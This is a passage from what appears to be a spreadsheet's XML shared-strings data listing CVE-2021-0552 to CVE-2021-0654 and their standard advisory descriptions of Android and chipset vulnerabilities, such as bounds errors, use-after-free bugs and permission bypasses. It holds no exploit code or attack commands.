    <t>In bind of MediaControlPanel.java, there is a possible way to lock up the system UI using a malicious media file due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-180518039</t>
  </si>
  <si>
    <t>CVE-2021-0552</t>
  </si>
  <si>
    <t>In getEndItemSliceAction of MediaOutputSlice.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-175124820</t>
  </si>
  <si>
    <t>CVE-2021-0553</t>
  </si>
  <si>
    <t>In onBindViewHolder of AppSwitchPreference.java, there is a possible bypass of device admin setttings due to unclear UI. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-169936038</t>
  </si>
  <si>
    <t>CVE-2021-0554</t>
  </si>
  <si>
    <t>In isBackupServiceActive of BackupManagerService.java, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-158482162</t>
  </si>
  <si>
    <t>CVE-2021-0555</t>
  </si>
  <si>
    <t>In RenderStruct of protostream_objectsource.cc, there is a possible crash due to a missing null check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179161711</t>
  </si>
  <si>
    <t>CVE-2021-0556</t>
  </si>
  <si>
    <t>In getBlockSum of fastcodemb.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-172716941</t>
  </si>
  <si>
    <t>CVE-2021-0557</t>
  </si>
  <si>
    <t>In setRange of ABuffer.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179046129</t>
  </si>
  <si>
    <t>CVE-2021-0558</t>
  </si>
  <si>
    <t>In fillMainDataBuf of pvmp3_framedecoder.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-173473906</t>
  </si>
  <si>
    <t>CVE-2021-0559</t>
  </si>
  <si>
    <t>In Lag_max of p_ol_wgh.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-172312730</t>
  </si>
  <si>
    <t>CVE-2021-0561</t>
  </si>
  <si>
    <t>In append_to_verify_fifo_interleaved_ of stream_encoder.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174302683</t>
  </si>
  <si>
    <t>CVE-2021-0562</t>
  </si>
  <si>
    <t>In RasterIntraUpdate of motion_est.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-176084648</t>
  </si>
  <si>
    <t>CVE-2021-0563</t>
  </si>
  <si>
    <t>In ih264e_fmt_conv_422i_to_420sp of ih264e_fmt_conv.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-172908358</t>
  </si>
  <si>
    <t>CVE-2021-0564</t>
  </si>
  <si>
    <t>In decrypt of CryptoPlugin.cpp, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-176495665</t>
  </si>
  <si>
    <t>CVE-2021-0565</t>
  </si>
  <si>
    <t>In wrapUserThread of AudioStream.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174801970</t>
  </si>
  <si>
    <t>CVE-2021-0566</t>
  </si>
  <si>
    <t>In accessAudioHalPidscpp of TimeCheck.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-175894436</t>
  </si>
  <si>
    <t>CVE-2021-0567</t>
  </si>
  <si>
    <t>In isRestricted of RemoteViews.java, there is a possible way to inject font files due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-179461812</t>
  </si>
  <si>
    <t>CVE-2021-0568</t>
  </si>
  <si>
    <t>In onReceive of DevicePolicyManagerService.java, there is a possible enabling of disabled profiles due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-170121238</t>
  </si>
  <si>
    <t>CVE-2021-0569</t>
  </si>
  <si>
    <t>In onStart of ContactsDumpActivity.java, there is possible access to contacts due to a tapjacking/overlay attack. This could lead to local information disclosure with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-174045870</t>
  </si>
  <si>
    <t>CVE-2021-0570</t>
  </si>
  <si>
    <t>In sendBugreportNotification of BugreportProgressService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-178803845</t>
  </si>
  <si>
    <t>CVE-2021-0571</t>
  </si>
  <si>
    <t>In ActivityTaskManagerService.startActivity() and AppTaskImpl.startActivity() of ActivityTaskManagerService.java and AppTaskImpl.java, there is possible access to restricted activities due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-137395936</t>
  </si>
  <si>
    <t>CVE-2021-0572</t>
  </si>
  <si>
    <t>In doNotification of AccountManagerService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-177931355</t>
  </si>
  <si>
    <t>CVE-2021-0573</t>
  </si>
  <si>
    <t>In asf extractor, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-187231635</t>
  </si>
  <si>
    <t>CVE-2021-0574</t>
  </si>
  <si>
    <t>In asf extractor, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-187234876</t>
  </si>
  <si>
    <t>CVE-2021-0576</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-187236084</t>
  </si>
  <si>
    <t>CVE-2021-0577</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-187161771</t>
  </si>
  <si>
    <t>CVE-2021-0578</t>
  </si>
  <si>
    <t>In wifi driver, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-187161772</t>
  </si>
  <si>
    <t>CVE-2021-0579</t>
  </si>
  <si>
    <t>In wifi driver, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-187231636</t>
  </si>
  <si>
    <t>CVE-2021-0580</t>
  </si>
  <si>
    <t>In wifi driver, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-187231637</t>
  </si>
  <si>
    <t>CVE-2021-0581</t>
  </si>
  <si>
    <t>In wifi driver, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-187231638</t>
  </si>
  <si>
    <t>CVE-2021-0582</t>
  </si>
  <si>
    <t>In wifi driver, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a proximal attacker with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-187149601</t>
  </si>
  <si>
    <t>CVE-2021-0583</t>
  </si>
  <si>
    <t>In onCreate of BluetoothPairingDialog, there is a possible way to enable Bluetooth without user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10Android ID: A-182282956</t>
  </si>
  <si>
    <t>CVE-2021-0584</t>
  </si>
  <si>
    <t>In verifyBufferObject of Parcel.cpp, there is a possible out of bounds read due to an improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-179289794</t>
  </si>
  <si>
    <t>CVE-2021-0585</t>
  </si>
  <si>
    <t>In beginWrite and beginRead of MessageQueueBase.h, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-184963385</t>
  </si>
  <si>
    <t>CVE-2021-0586</t>
  </si>
  <si>
    <t>In onCreate of DevicePickerFragment.java, there is a possible way to trick the user to select an unwanted bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-182584940</t>
  </si>
  <si>
    <t>CVE-2021-0587</t>
  </si>
  <si>
    <t>In StreamOut::prepareForWriting of StreamOut.cpp, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-185259758</t>
  </si>
  <si>
    <t>CVE-2021-0588</t>
  </si>
  <si>
    <t>In processInboundMessage of MceStateMachine.java, there is a possible SMS disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9Android ID: A-177238342</t>
  </si>
  <si>
    <t>CVE-2021-0589</t>
  </si>
  <si>
    <t>In BTM_TryAllocateSCN of btm_scn.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-180939982</t>
  </si>
  <si>
    <t>CVE-2021-0590</t>
  </si>
  <si>
    <t>In sendNetworkConditionsBroadcast of NetworkMonitor.java, there is a possible way for a privileged app to receive WiFi BSSID and SSID without location permissions due to a missing permission check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-175213041</t>
  </si>
  <si>
    <t>CVE-2021-0591</t>
  </si>
  <si>
    <t>In sendReplyIntentToReceiver of BluetoothPermissionActivity.java, there is a possible way to invoke privileged broadcast receivers due to a confused deputy. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-179386960</t>
  </si>
  <si>
    <t>CVE-2021-0592</t>
  </si>
  <si>
    <t>In various functions in WideVine, there are possible out of bounds writes due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-188061006</t>
  </si>
  <si>
    <t>CVE-2021-0593</t>
  </si>
  <si>
    <t>In sendDevicePickedIntent of DevicePickerFragment.java, there is a possible way to invoke a privileged broadcast receiver due to a confused deputy. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-179386068</t>
  </si>
  <si>
    <t>CVE-2021-0594</t>
  </si>
  <si>
    <t>In onCreate of ConfirmConnectActivity, there is a possible remote bypass of user consent due to improper input validation. This could lead to remote (proximal, NFC) escalation of privilege allowing an attacker to deceive a user into allowing a Bluetooth connection with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-176445224</t>
  </si>
  <si>
    <t>CVE-2021-0595</t>
  </si>
  <si>
    <t>In lockAllProfileTasks of RootWindowContainer.java, there is a possible way to access the work profile without the profile PIN, after logging in. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-177457096</t>
  </si>
  <si>
    <t>CVE-2021-0596</t>
  </si>
  <si>
    <t>In phNciNfc_RecvMfResp of phNxpExtns_MifareStd.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure over NFC with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181346550</t>
  </si>
  <si>
    <t>CVE-2021-0597</t>
  </si>
  <si>
    <t>In notifyProfileAdded and notifyProfileRemoved of SipService.java, there is a possible way to retrieve SIP account names due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-176496502</t>
  </si>
  <si>
    <t>CVE-2021-0598</t>
  </si>
  <si>
    <t>In onCreate of ConfirmConnectActivity.java, there is a possible pairing of untrusted Bluetooth devices due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-180422108</t>
  </si>
  <si>
    <t>CVE-2021-0599</t>
  </si>
  <si>
    <t>In scheduleTimeoutLocked of NotificationRecord.java, there is a possible disclosure of a sensitive identifier via broadcasted intent due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-175614289</t>
  </si>
  <si>
    <t>CVE-2021-0600</t>
  </si>
  <si>
    <t>In onCreate of DeviceAdminAdd.java, there is a possible way to mislead a user to activate a device admin app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-179042963</t>
  </si>
  <si>
    <t>CVE-2021-0601</t>
  </si>
  <si>
    <t>In encodeFrames of avc_enc_fuzzer.cpp, there is a possible out of bounds write due to a double free. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-180643802</t>
  </si>
  <si>
    <t>CVE-2021-0602</t>
  </si>
  <si>
    <t>In onCreateOptionsMenu of WifiNetworkDetailsFragment.java, there is a possible way for guest users to view and modify Wi-Fi settings for all configured APs due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-177573895</t>
  </si>
  <si>
    <t>CVE-2021-0603</t>
  </si>
  <si>
    <t>In onCreate of ContactSelectionActivity.java, there is a possible way to get access to contacts without permission due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-182809425</t>
  </si>
  <si>
    <t>CVE-2021-0604</t>
  </si>
  <si>
    <t>In generateFileInfo of BluetoothOppSendFileInfo.java, there is a possible way to share private files over Bluetooth due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-179910660</t>
  </si>
  <si>
    <t>CVE-2021-0605</t>
  </si>
  <si>
    <t>In pfkey_dump of af_key.c, there is a possible out-of-bounds read due to a missing bounds check. This could lead to local information disclosure in the kernel with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-110373476</t>
  </si>
  <si>
    <t>CVE-2021-0606</t>
  </si>
  <si>
    <t>In drm_syncobj_handle_to_fd of drm_syncobj.c, there is a possible use after free due to incorrect refcounting. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168034487</t>
  </si>
  <si>
    <t>CVE-2021-0607</t>
  </si>
  <si>
    <t>In iaxxx_calc_i2s_div of iaxxx-codec.c, there is a possible hardware port write with user controlled data due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-180950209</t>
  </si>
  <si>
    <t>CVE-2021-0608</t>
  </si>
  <si>
    <t>In handleAppLaunch of AppLaunchActivity.java, there is a possible arbitrary activity launch due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-174870704</t>
  </si>
  <si>
    <t>CVE-2021-0610</t>
  </si>
  <si>
    <t>In memory management driver, there is a possible memory corruption due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05411456.</t>
  </si>
  <si>
    <t>CVE-2021-0611</t>
  </si>
  <si>
    <t>In m4u, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05425810.</t>
  </si>
  <si>
    <t>CVE-2021-0612</t>
  </si>
  <si>
    <t>In m4u, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05403499; Issue ID: ALPS05425834.</t>
  </si>
  <si>
    <t>CVE-2021-0613</t>
  </si>
  <si>
    <t>In asf extractor, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05489178; Issue ID: ALPS05489178.</t>
  </si>
  <si>
    <t>CVE-2021-0614</t>
  </si>
  <si>
    <t>In asf extractor, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05495528; Issue ID: ALPS05495528.</t>
  </si>
  <si>
    <t>CVE-2021-0615</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561369; Issue ID: ALPS05561369.</t>
  </si>
  <si>
    <t>CVE-2021-0616</t>
  </si>
  <si>
    <t>In ape extractor, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561389; Issue ID: ALPS05561389.</t>
  </si>
  <si>
    <t>CVE-2021-0617</t>
  </si>
  <si>
    <t>In ape extractor, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561391; Issue ID: ALPS05561391.</t>
  </si>
  <si>
    <t>CVE-2021-0618</t>
  </si>
  <si>
    <t>In ape extractor, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561394; Issue ID: ALPS05561394.</t>
  </si>
  <si>
    <t>CVE-2021-0619</t>
  </si>
  <si>
    <t>In ape extractor, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05561395; Issue ID: ALPS05561395.</t>
  </si>
  <si>
    <t>CVE-2021-0620</t>
  </si>
  <si>
    <t>In asf extractor, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05489178; Issue ID: ALPS05561381.</t>
  </si>
  <si>
    <t>CVE-2021-0621</t>
  </si>
  <si>
    <t>In asf extractor, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05489178; Issue ID: ALPS05561383.</t>
  </si>
  <si>
    <t>CVE-2021-0622</t>
  </si>
  <si>
    <t>In asf extractor, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05489178; Issue ID: ALPS05561388.</t>
  </si>
  <si>
    <t>CVE-2021-0623</t>
  </si>
  <si>
    <t>In asf extractor, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05489178; Issue ID: ALPS05585817.</t>
  </si>
  <si>
    <t>CVE-2021-0624</t>
  </si>
  <si>
    <t>In flv extractor, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05594988; Issue ID: ALPS05594988.</t>
  </si>
  <si>
    <t>CVE-2021-0625</t>
  </si>
  <si>
    <t>In ccu, there is a possible memory corruption due to improper locking. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05594996; Issue ID: ALPS05594996.</t>
  </si>
  <si>
    <t>CVE-2021-0626</t>
  </si>
  <si>
    <t>In ged, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05687510; Issue ID: ALPS05687510.</t>
  </si>
  <si>
    <t>CVE-2021-0627</t>
  </si>
  <si>
    <t>In OMA DRM, there is a possible memory corruption due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05722434; Issue ID: ALPS05722434.</t>
  </si>
  <si>
    <t>CVE-2021-0628</t>
  </si>
  <si>
    <t>In OMA DRM, there is a possible memory corruption due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05722454; Issue ID: ALPS05722454.</t>
  </si>
  <si>
    <t>CVE-2021-0629</t>
  </si>
  <si>
    <t>In mdlactl driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05776625; Issue ID: ALPS05776625.</t>
  </si>
  <si>
    <t>CVE-2021-0630</t>
  </si>
  <si>
    <t>In wifi driver, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05551397; Issue ID: ALPS05551397.</t>
  </si>
  <si>
    <t>CVE-2021-0631</t>
  </si>
  <si>
    <t>In wifi driver, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05551435; Issue ID: ALPS05551435.</t>
  </si>
  <si>
    <t>CVE-2021-0632</t>
  </si>
  <si>
    <t>In wifi driver, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure to a proximal attacker under certain build conditions with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05560246; Issue ID: ALPS05551383.</t>
  </si>
  <si>
    <t>CVE-2021-0633</t>
  </si>
  <si>
    <t>In display driver, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05585423; Issue ID: ALPS05585423.</t>
  </si>
  <si>
    <t>CVE-2021-0634</t>
  </si>
  <si>
    <t>In display driver, there is a possible memory corruption due to uninitialized data. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05594994; Issue ID: ALPS05594994.</t>
  </si>
  <si>
    <t>CVE-2021-0635</t>
  </si>
  <si>
    <t>When extracting the incorrectly formatted flv file, the memory is damaged, the playback interface shows that the video cannot be played, and the log is found to be crashed. This problem may lead to hacker malicious code attacks, resulting in the loss of user rights.Product: Androidversion:Android-10Android ID: A-189402477</t>
  </si>
  <si>
    <t>CVE-2021-0636</t>
  </si>
  <si>
    <t>When extracting the incorrectly formatted avi file, the memory is damaged, the playback interface shows that the video cannot be played, and the log is found to be crashed. This problem may lead to hacker malicious code attacks, resulting in the loss of user rights.Product: Androidversion: Android-10Android ID: A-189392423</t>
  </si>
  <si>
    <t>CVE-2021-0639</t>
  </si>
  <si>
    <t>In multiple functions of libl3oemcrypto.cpp, there is a possible weakness in the existing obfuscation mechanism due to the way sensitive data is handled. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-190724551</t>
  </si>
  <si>
    <t>CVE-2021-0640</t>
  </si>
  <si>
    <t>In noteAtomLogged of StatsdStats.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-187957589</t>
  </si>
  <si>
    <t>CVE-2021-0641</t>
  </si>
  <si>
    <t>In getAvailableSubscriptionInfoList of SubscriptionController.java, there is a possible disclosure of unique identifiers due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-185235454</t>
  </si>
  <si>
    <t>CVE-2021-0642</t>
  </si>
  <si>
    <t>In onResume of VoicemailSettingsFragment.java, there is a possible way to retrieve a trackable identifier without permissions due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-185126149</t>
  </si>
  <si>
    <t>CVE-2021-0643</t>
  </si>
  <si>
    <t>In getAllSubInfoList of SubscriptionController.java, there is a possible way to retrieve a long term identifier without the correct permissions due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12Android ID: A-183612370</t>
  </si>
  <si>
    <t>CVE-2021-0644</t>
  </si>
  <si>
    <t>In conditionallyRemoveIdentifiers of SubscriptionController.java, there is a possible way to retrieve a trackable identifier due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-181053462</t>
  </si>
  <si>
    <t>CVE-2021-0645</t>
  </si>
  <si>
    <t>In shouldBlockFromTree of ExternalStorageProvider.java, there is a possible permissions bypass. This could lead to local escalation of privilege, allowing an app to read private app directories in external storage, which should be restricted in Android 11, with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-157320644</t>
  </si>
  <si>
    <t>CVE-2021-0646</t>
  </si>
  <si>
    <t>In sqlite3_str_vappendf of sqlite3.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege if the user can also inject a printf into a privileged process's SQL with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-153352319</t>
  </si>
  <si>
    <t>CVE-2021-0649</t>
  </si>
  <si>
    <t>In stopVpnProfile of Vpn.java, there is a possible VPN profile reset due to a permissions bypass. This could lead to local escalation of privilege CONTROL_ALWAYS_ON_VPN with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-191382886</t>
  </si>
  <si>
    <t>CVE-2021-0650</t>
  </si>
  <si>
    <t>In WT_InterpolateNoLoop of eas_wtengine.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-190286685</t>
  </si>
  <si>
    <t>CVE-2021-0651</t>
  </si>
  <si>
    <t>In loadLabel of PackageItemInfo.java, there is a possible way to DoS a device by having a long label in an app due to incorrect input validation. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-67013844</t>
  </si>
  <si>
    <t>CVE-2021-0652</t>
  </si>
  <si>
    <t>In VectorDrawable::VectorDrawable of VectorDrawable.java, there is a possible way to introduce a memory corruption due to sharing of not thread-safe objects. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-185178568</t>
  </si>
  <si>
    <t>CVE-2021-0653</t>
  </si>
  <si>
    <t>In enqueueNotification of NetworkPolicyManagerService.java, there is a possible way to retrieve a trackable identifier due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-177931370</t>
  </si>
  <si>
    <t>CVE-2021-0654</t>
  </si>
  <si>
    <t>In isRealSnapshot of TaskThumbnailView.java, there is possible data exposure due to a missing permission check. This could lead to local information disclosure from locked profiles with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-168802517References: N/A</t>
  </si>
  <si>
